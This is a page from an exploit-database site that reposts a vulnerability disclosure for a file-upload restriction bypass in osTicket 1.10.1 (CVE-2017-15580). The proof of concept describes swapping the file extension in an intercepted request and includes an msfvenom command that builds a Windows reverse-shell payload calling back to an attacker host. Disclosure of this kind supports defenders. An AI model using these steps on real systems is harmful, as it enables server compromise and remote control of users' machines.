0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
osTicket 1.10.1 Shell Upload Vulnerability
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
Reference: https://becomepentester.blogspot.ae/2017/10/osTicket-File-Upload- Restrictions-Bypassed-CVE-2017-15580.html *# Exploit Title: File Upload Restrictions Bypassed* *# Date: 18 October, 2017* *# Exploit Author: Rajwinder Singh* *# Vendor Homepage: http://osticket.com/ <http://osticket.com/>* *# Software Link: http://osticket.com/download/go?dl=osTicket-v1.10.1.zip <http://osticket.com/download/go?dl=osTicket-v1.10.1.zip>* *# Version: v1.10.1* *# CVE : 2017-15580* Vulnerability Details: ====================== osTicket application provides a functionality to upload 'html' files with associated formats. However, application does not properly validate the uploaded fileas contents and thus accepts any type of files. *Proof-of-Concept:* ==================== Uploaded shell to get reverse shell of end user for the demo purpose. 1. Created a valid '.html' file to bypass client-side validations. <html> <title>test</title> <body> <p>test page</p> </body> </html> 2. Created a reverse shell with '.exe' file extension using msfvenom. msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<YOUR IP> LPORT=4444 -b "\x00" -e <encoder> -f exe -o reverse.exe https://www.offensive-security.com/metasploit-unleashed/binary-payloads/ 3. As shown in the below screenshot, intercepted the request and changed file extension '.html' to '.exe' and received a valid response from server along with uploaded malicious file. <https://3.bp.blogspot.com/-XqKsaTccLvg/WebuXgaRd7I/AAAAAAAANVs/NoWSFi9Mmwol8KxzUJQzyCSonov3yqg6gCLcBGAs/s1600/1.file_upload_extension_bypass.JPG> *Response:* <https://4.bp.blogspot.com/-3peKN-VR_os/Webulv3N7aI/AAAAAAAANVw/17FtsSCVNoIxTcEsfUle4VxQKYlQoBAqQCLcBGAs/s1600/2.file_upload_extension_bypass.JPG> 4. As shown in the below screenshot, successfully uploaded malicious file on the server. <https://4.bp.blogspot.com/-lH2vbsUDKZQ/Webu0WOio-I/AAAAAAAANV0/Jl8KFD0cHZsinpENfc1hV8OaDtcH1P0YQCLcBGAs/s1600/3.file_upload_extension_bypass.JPG> Ready to get reverse shell. *Affected Component:* ==================== *Parameter:* tickets.php?id=<ticket_number>#reply *Disclosure Timeline:* ===================== Vendor Confirmation: 11 October, 2017 Mitre Notification: 17 October, 2017 Public Disclosure: 18 October, 2017 *Exploitation Technique:* ======================= Remote *Severity Level:* ================ High *Description:* ===================================================== Request Method(s): [+] POST Vulnerable Product: [+] osTicket - v1.10.1 Vulnerable Parameter(s): [+] tickets.php?id=<ticket_number>#reply # 0day.today [2024-09-28] #